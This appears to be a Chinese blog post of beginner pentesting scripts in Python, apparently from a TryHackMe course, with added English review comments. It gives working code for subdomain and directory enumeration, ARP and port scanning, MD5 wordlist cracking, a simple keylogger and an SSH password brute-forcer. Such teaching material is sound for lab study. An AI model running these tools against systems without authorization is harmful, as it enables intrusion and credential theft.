Python for Pentesters
还记得刚开始学习编程时学的是C语言,虽然已经淡忘,但思想仍在。
子域名枚举
requests库
import paramiko
import requests
import sys
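import pyfiglet  # the banner needs it; the import list above pulls in paramiko instead

ascii_banner = pyfiglet.figlet_format("ABC-L")
print(ascii_banner)

# The parent domain is taken from the first command-line argument.
if len(sys.argv) < 2:
    raise SystemExit("usage: <script> <domain>")

# Wordlist of candidate labels, one per line. The page leaves the path blank;
# it has to be set before the script can run.
dir_path = ""
# Context manager so the wordlist handle is closed even if reading fails.
with open(dir_path, "r") as wordlist:
    subdoms = wordlist.read().splitlines()

# Every candidate costs one name lookup plus one HTTP GET, so a run is visible
# in resolver and web-server logs as a burst of requests for names that
# mostly do not exist.
for sub in subdoms:
    sub_domains = f"http://{sub}.{sys.argv[1]}"
    try:
        # Without a timeout a single unresponsive host stalls the whole run.
        requests.get(sub_domains, timeout=5)
    except (requests.ConnectionError, requests.Timeout):
        # Name did not resolve or host did not answer: not reported.
        pass
    else:
        print("Valid domain: ", sub_domains)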
目录枚举
还是requests
import requests
import sys
import paramiko
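import pyfiglet  # the banner needs it; the import list above pulls in paramiko instead

ascii_banner = pyfiglet.figlet_format("ABC-L")
print(ascii_banner)

# The host to query is taken from the first command-line argument.
if len(sys.argv) < 2:
    raise SystemExit("usage: <script> <host>")

# Wordlist of candidate paths, one per line. The page leaves the path blank;
# it has to be set before the script can run.
path = ''
# Context manager so the wordlist handle is closed even if reading fails.
with open(path, 'r') as wordlist:
    directories = wordlist.read().splitlines()

# "entry" instead of the original loop name "dir", which shadowed the builtin.
for entry in directories:
    dir_enum = f"http://{sys.argv[1]}/{entry}"
    try:
        # Bounded wait; the original call could block indefinitely.
        r = requests.get(dir_enum, timeout=5)
    except (requests.ConnectionError, requests.Timeout) as err:
        # The original aborted with a traceback on the first network error.
        print("Request failed:", dir_enum, err)
        continue
    # Only 404 is treated as "absent": 401/403 and 5xx responses are listed as
    # valid too, so the output needs reading with the status code in mind.
    if r.status_code != 404:
        print("Valid directory:", dir_enum)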
网络扫描
from scapy.all import *
import paramiko
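import pyfiglet  # the banner needs it; the imports above do not provide it

ascii_banner = pyfiglet.figlet_format("ABC-L")
print(ascii_banner)

interface = "eth0"
# Placeholder CIDR from the page; the X octets must be replaced with the
# subnet of the lab network before this runs.
ip_range = "10.10.X.X/24"
broadcastMac = "ff:ff:ff:ff:ff:ff"

# Broadcast Ethernet frame carrying an ARP request for the addresses in ip_range.
packet = Ether(dst=broadcastMac) / ARP(pdst=ip_range)

# srp() sends at layer 2 and returns (answered, unanswered) packet lists.
# NOTE(review): scapy normally needs raw-socket privileges for this call.
# On the wire the sweep is a run of ARP requests from one source MAC, which
# is what ARP-scan detection on a switch or NIDS keys on.
ans, _unanswered = srp(packet, timeout=2, iface=interface, inter=0.1)

# Each answered entry is a (sent, received) pair; print the responder's
# MAC and IP taken from the reply.
for _sent, received in ans:
    print(received.sprintf(r"%Ether.src% - %ARP.psrc%"))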
端口扫描
socket编程参考:https://www.cnblogs.com/-Lucky-/p/17039661.html
import sys
import socket
import pyfiglet
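ascii_banner = pyfiglet.figlet_format("ABC-L")
print(ascii_banner)

# Target address comes from the first command-line argument.
ip = sys.argv[1]
# Filled in by the scan loop with every port that accepted a connection.
open_ports = []
# range() excludes its stop value: the original range(1, 65535) silently
# skipped port 65535, so the stop has to be 65536 to cover 1-65535.
ports = range(1, 65536)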
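def probe_port(ip, port):
    """Attempt a full TCP connect to (ip, port) and report the outcome.

    Args:
        ip: Host name or IPv4 address to connect to.
        port: TCP port number.

    Returns:
        0 if the connection was established (port open), otherwise 1.
    """
    result = 1
    try:
        # The context manager closes the socket on every path; the original
        # leaked it whenever connect_ex() raised (e.g. a resolution failure).
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            # Short timeout so ports that never answer do not stall the caller.
            sock.settimeout(0.5)
            # connect_ex() returns an errno instead of raising; 0 means connected.
            if sock.connect_ex((ip, port)) == 0:
                result = 0
    except (OSError, OverflowError):
        # Resolution errors and out-of-range port numbers count as "not open".
        pass
    return result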
# Probe each port in turn; probe_port() returns 0 only for a completed
# connection, and those ports are collected in open_ports.
for port in ports:
    sys.stdout.flush()
    if probe_port(ip, port) != 0:
        continue
    open_ports.append(port)

# Single summary line once the whole range has been tried.
print(f"Open Ports:{open_ports}")
文件下载器
Linux 系统上的 Wget 或 Windows 上的 Certutil 是下载文件的有用工具。
import requests
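url = 'https://assets.tryhackme.com/img/THMlogo.png'
# Bounded wait so a stalled server cannot hang the script.
r = requests.get(url, allow_redirects=True, timeout=30)
# Stop on 4xx/5xx rather than saving an error page under the image's name.
r.raise_for_status()
# The context manager flushes and closes the file; the original left the
# handle from open(...).write(...) for the garbage collector.
with open('THMlogo.png', 'wb') as out_file:
    out_file.write(r.content)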
import requests
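url = 'https://download.sysinternals.com/files/PSTools.zip'
# Bounded wait so a stalled server cannot hang the script.
r = requests.get(url, allow_redirects=True, timeout=30)
# Stop on 4xx/5xx rather than saving an error page as a .zip.
r.raise_for_status()
# The context manager flushes and closes the file; the original left the
# handle from open(...).write(...) for the garbage collector.
with open('PSTools.zip', 'wb') as out_file:
    out_file.write(r.content)
# Nothing here verifies what was received. The archive holds executables, so
# its digest or signature should be checked against a value obtained from a
# trusted source before it is unpacked or run.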
hash破解
tools:john,hashcat
import hashlib
import pyfiglet
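ascii_banner = pyfiglet.figlet_format("ABC-L")
print(ascii_banner)

wordlist_location = input('Enter wordlist file location: ')
# hexdigest() yields lowercase hex with no whitespace, so the pasted hash is
# normalised the same way; otherwise an upper-case or padded hash never matches.
hash_input = input('Enter hash to be cracked: ').strip().lower()

# The whole check is one unsalted MD5 per candidate. That cost is why stored
# passwords should use a salted, deliberately slow KDF rather than a bare digest.
with open(wordlist_location, 'r') as file:
    # Iterate lazily instead of loading the entire wordlist with readlines().
    for line in file:
        print(line)
        candidate = line.strip()
        hashed_pass = hashlib.md5(candidate.encode()).hexdigest()
        if hashed_pass == hash_input:
            print('Found cleartext password! ' + candidate)
            # SystemExit instead of the site-provided exit(), which is not
            # guaranteed to exist outside an interactive session.
            raise SystemExit(0)

# Reached only when no candidate matched; the original ended silently here.
print('No match found in wordlist.')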
键盘记录器
import keyboard
# Capture keyboard events until ENTER is pressed, then replay the captured
# sequence. NOTE(review): the keyboard library hooks events globally rather
# than per window, which is behaviour endpoint protection commonly flags.
recorded_events = keyboard.record(until="ENTER")
keyboard.play(recorded_events)
ssh暴力破解
tools:hydra
import paramiko
import sys
import os
# Connection parameters are collected interactively. ssh_connect() reads
# target and username as module-level globals; password_file is opened by
# the loop at the bottom of the script. input() already returns str.
target = input('Please enter target IP address: ')
username = input('Please enter username to bruteforce: ')
password_file = input('Please enter location of the password file: ')
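def ssh_connect(password, code=0):
    """Try one password for the module-level ``username`` on ``target`` (port 22).

    Args:
        password: Candidate password for this attempt.
        code: Value returned when the server accepts the credentials
            (defaults to 0).

    Returns:
        ``code`` when authentication succeeds, 1 when the server rejects it.

    Raises:
        Any error from ``connect()`` other than
        ``paramiko.AuthenticationException`` propagates to the caller.
    """
    ssh = paramiko.SSHClient()
    # AutoAddPolicy accepts whatever host key the server presents, so the
    # identity of the remote host is never verified by this client.
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        ssh.connect(target, port=22, username=username, password=password)
    except paramiko.AuthenticationException:
        # Rejected credentials. Each rejection is typically recorded by the
        # SSH server as a failed login, which is what lockout and alerting
        # rules count.
        code = 1
    finally:
        # Release the client on every path; the original skipped close()
        # when connect() raised anything other than AuthenticationException.
        ssh.close()
    return code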
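# Try each line of the password file in order, stopping at the first one
# the server accepts.
with open(password_file, 'r') as file:
    # Iterate lazily instead of loading the whole list with readlines().
    for line in file:
        password = line.strip()
        try:
            response = ssh_connect(password)
        except Exception as e:
            # Connection-level failure (not an authentication rejection):
            # report it and carry on with the next candidate.
            print(e)
            continue
        if response == 0:
            print('password found: ' + password)
            sys.exit(0)
        elif response == 1:
            print('no luck')
# No explicit close: the with-statement has already closed the file. The
# original's trailing input_file.close() referenced a name that was never
# defined and raised NameError once the list was exhausted.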
From: https://www.cnblogs.com/-Lucky-/p/17189947.html